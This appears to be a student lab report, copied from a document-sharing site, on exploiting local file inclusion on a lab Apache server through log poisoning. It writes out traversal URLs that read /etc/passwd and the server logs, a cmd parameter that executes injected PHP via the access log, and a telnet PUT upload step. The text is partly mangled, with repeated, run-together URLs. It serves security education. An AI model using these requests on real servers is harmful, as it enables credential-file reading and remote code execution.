Upload
alfonso-velasco
View
213
Download
0
Embed Size (px)
Citation preview
8/15/2019 LFI vulnerability
1/7
8/15/2019 LFI vulnerability
2/7
Objective
Demonstrate and exploit the LFI vulnerability on an Apache Server through ApacheLog Injection.
MethodsThe first thing that is necessary to do is verify if the apache server that is the objective
to the attack is vulnerable, thus we send a directory transversal attack in order to
verify this, in the URL of the web application that are contain in the server we put thedirectory /etc/passwd at the final of the string like this:
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00
The result of sending this URL is show below:
Figure 1 Apache /etc/passwd contain
The directory to which we agreed contains users and passwords that manages the Apache server that we are attacking, it also let us to know the OS on which the server
is installed, in this case is FreeBSD.Once that we verify that the vulnerability exists in the server we proceed to search
where is the access log located because we are going to use an Apache log injectionattack, for this we access to the default distro’s layout:
http://wiki.apache.org/httpd/DistrosDefaultLayout
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://wiki.apache.org/httpd/DistrosDefaultLayouthttp://wiki.apache.org/httpd/DistrosDefaultLayouthttp://wiki.apache.org/httpd/DistrosDefaultLayouthttp://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00
8/15/2019 LFI vulnerability
3/7
8/15/2019 LFI vulnerability
4/7
Another test that we can do is to try to get the Error logs of the server, for this we
send the next request:
192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-error.log%00
Below we can see that we also obtain the error logs of the apache server
Figure 4 Error logs contains on the Apache Server
Once that we found the logs of the server we proceed to inject PHP code to the
server via a raw socket connection, in this case I use Telnet, once that we connectto the server we inject the PHP code that is below.
GET / HTTP/1.1
Where:
GET Is using in order to the data that are send by the server as an answer to arequest will be visible on the browser.
Eval Evaluates a string as PHP code. The string must be valid PHP code and mustend with semicolon. In this case eval let us execute commands “cmd” in the server.
CMD Is the name of the variable that let us send data through GET
The process to connect with the server and the injection of the code is show below.
8/15/2019 LFI vulnerability
5/7
Figure 5 Connection with the server and code injection
After the code injection we proceed to verify that it is function correctly by sendingthe follow URL
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00
The result of this request is show below (the cmd window is only for demonstratethat the request is send by my IP)
Figure 6 PHPinfo obtain via LFI attack
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00
8/15/2019 LFI vulnerability
6/7
Once we are able to send cmd request we can obtain UID, PHPinfo, and the rc.conf
data from the server, below I show the id and the rc.conf data
Figure 7 Rc.conf directory
Figure 8 Server UID
Exists a lot of forms to inject code but most of all give us the same result, one of
them is inject a .txt file via a raw socket with the PUT method, an example of it isshow below:
telnet 192.168.116.134 80
trying to connect 192.168.116.134 80
PUT /file_name.txt HTTP/1.1
8/15/2019 LFI vulnerability
7/7
The content of the .txt file is the following php code
The code let us to obtain the server info via apache commands like the previousprocess that I explain before.
Conclusions
The development of this exercise wasn’t successful because I couldn’t obtain a
remote shell, despite this the knowledge obtain is very valuable because from thisattack a lot of attacks can be done and consequently prevent allowing an
improvement to the security student. Personally I will continue with this exercise andI hope to achieve the full objective and share to the teacher.